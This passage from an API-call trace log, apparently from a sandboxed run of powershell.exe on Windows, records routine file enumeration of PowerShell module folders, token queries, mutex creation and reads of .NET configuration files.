ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0226.867] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0226.867] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0226.868] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0226.868] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0226.869] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0226.870] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0226.870] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0226.871] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0226.874] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0226.874] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0226.875] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0226.876] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0226.876] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0226.877] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0226.879] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0226.885] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0226.886] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0226.887] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0226.888] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0226.890] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe5f0) returned 1 [0226.890] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.891] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0226.892] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0226.932] CoTaskMemAlloc (cb=0x20e) returned 0x5e1bc0 [0226.932] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x5e1bc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0226.932] CoTaskMemFree (pv=0x5e1bc0) [0226.939] CoTaskMemAlloc (cb=0x20c) returned 0x5e1bc0 [0226.939] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5e1bc0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0226.943] CoTaskMemFree (pv=0x5e1bc0) [0226.943] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0226.945] GetCurrentProcess () returned 0xffffffffffffffff [0226.945] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fe6c8 | out: TokenHandle=0x1b7fe6c8*=0x67c) returned 1 [0226.946] GetTokenInformation (in: TokenHandle=0x67c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b7fe7c8 | out: TokenInformation=0x0, ReturnLength=0x1b7fe7c8) returned 0 [0226.946] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1a9a8780 [0226.946] GetTokenInformation (in: TokenHandle=0x67c, TokenInformationClass=0x1, TokenInformation=0x1a9a8780, TokenInformationLength=0x2c, ReturnLength=0x1b7fe7c8 | out: TokenInformation=0x1a9a8780, ReturnLength=0x1b7fe7c8) returned 1 [0226.946] LocalFree (hMem=0x1a9a8780) returned 0x0 [0226.949] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x26ac8f0, cbSid=0x1b7fe7c0 | out: pSid=0x26ac8f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x1b7fe7c0) returned 1 [0226.954] CreateMutexW (lpMutexAttributes=0x26acab0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x564 [0226.958] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7fe660*=0x564, lpdwindex=0x1b7fe434 | out: lpdwindex=0x1b7fe434) returned 0x0 [0227.184] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7fe1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0227.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe5e0) returned 1 [0227.184] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe6c0 | out: lpFileInformation=0x1b7fe6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0227.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe5a0) returned 1 [0227.272] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x1b7fe040, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0227.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe520) returned 1 [0227.272] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x684 [0227.273] GetFileType (hFile=0x684) returned 0x1 [0227.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe490) returned 1 [0227.273] GetFileType (hFile=0x684) returned 0x1 [0227.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b7fcc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0227.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b7fcb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0227.491] CoTaskMemAlloc (cb=0x20c) returned 0x1a9acb50 [0227.491] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a9acb50, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0227.491] CoTaskMemFree (pv=0x1a9acb50) [0227.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1b7fcd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0227.513] GetCurrentProcess () returned 0xffffffffffffffff [0227.513] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fcf88 | out: TokenHandle=0x1b7fcf88*=0x688) returned 1 [0227.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x1b7fc9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0227.517] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1b7fd040 | out: lpFileInformation=0x1b7fd040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0227.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1b7fc9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0227.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1b7fd028 | out: lpFileInformation=0x1b7fd028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0227.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1b7fc9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0227.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fcea0) returned 1 [0227.520] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x68c [0227.520] GetFileType (hFile=0x68c) returned 0x1 [0227.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fce10) returned 1 [0227.520] GetFileType (hFile=0x68c) returned 0x1 [0227.522] GetFileSize (in: hFile=0x68c, lpFileSizeHigh=0x1b7fcf78 | out: lpFileSizeHigh=0x1b7fcf78*=0x0) returned 0x8c8f [0227.522] ReadFile (in: hFile=0x68c, lpBuffer=0x26b13c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fcee8, lpOverlapped=0x0 | out: lpBuffer=0x26b13c8*, lpNumberOfBytesRead=0x1b7fcee8*=0x1000, lpOverlapped=0x0) returned 1 [0227.529] ReadFile (in: hFile=0x68c, lpBuffer=0x26b13c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fccc8, lpOverlapped=0x0 | out: lpBuffer=0x26b13c8*, lpNumberOfBytesRead=0x1b7fccc8*=0x1000, lpOverlapped=0x0) returned 1 [0227.531] ReadFile (in: hFile=0x68c, lpBuffer=0x26b13c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fcab8, lpOverlapped=0x0 | out: lpBuffer=0x26b13c8*, lpNumberOfBytesRead=0x1b7fcab8*=0x1000, lpOverlapped=0x0) returned 1 [0227.531] ReadFile (in: hFile=0x68c, lpBuffer=0x26b13c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fcab8, lpOverlapped=0x0 | out: lpBuffer=0x26b13c8*, lpNumberOfBytesRead=0x1b7fcab8*=0x1000, lpOverlapped=0x0) returned 1 [0227.532] ReadFile (in: hFile=0x68c, lpBuffer=0x26b13c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fcab8, lpOverlapped=0x0 | out: lpBuffer=0x26b13c8*, lpNumberOfBytesRead=0x1b7fcab8*=0x1000, lpOverlapped=0x0) returned 1 [0227.532] ReadFile (in: hFile=0x68c, lpBuffer=0x26b13c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fc978, lpOverlapped=0x0 | out: lpBuffer=0x26b13c8*, lpNumberOfBytesRead=0x1b7fc978*=0x1000, lpOverlapped=0x0) returned 1 [0227.538] ReadFile (in: hFile=0x68c, lpBuffer=0x26b13c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fcbb8, lpOverlapped=0x0 | out: lpBuffer=0x26b13c8*, lpNumberOfBytesRead=0x1b7fcbb8*=0x1000, lpOverlapped=0x0) returned 1 [0227.613] ReadFile (in: hFile=0x68c, lpBuffer=0x26b13c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fca68, lpOverlapped=0x0 | out: lpBuffer=0x26b13c8*, lpNumberOfBytesRead=0x1b7fca68*=0x1000, lpOverlapped=0x0) returned 1 [0227.613] ReadFile (in: hFile=0x68c, lpBuffer=0x26b13c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fca68, lpOverlapped=0x0 | out: lpBuffer=0x26b13c8*, lpNumberOfBytesRead=0x1b7fca68*=0xc8f, lpOverlapped=0x0) returned 1 [0227.613] ReadFile (in: hFile=0x68c, lpBuffer=0x26b13c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fcb88, lpOverlapped=0x0 | out: lpBuffer=0x26b13c8*, lpNumberOfBytesRead=0x1b7fcb88*=0x0, lpOverlapped=0x0) returned 1 [0227.613] CloseHandle (hObject=0x68c) returned 1 [0227.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b7fcd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0227.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b7fcbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0227.614] CoTaskMemAlloc (cb=0x20c) returned 0x1a9ac710 [0227.614] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a9ac710, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0227.614] CoTaskMemFree (pv=0x1a9ac710) [0227.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1b7fcda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 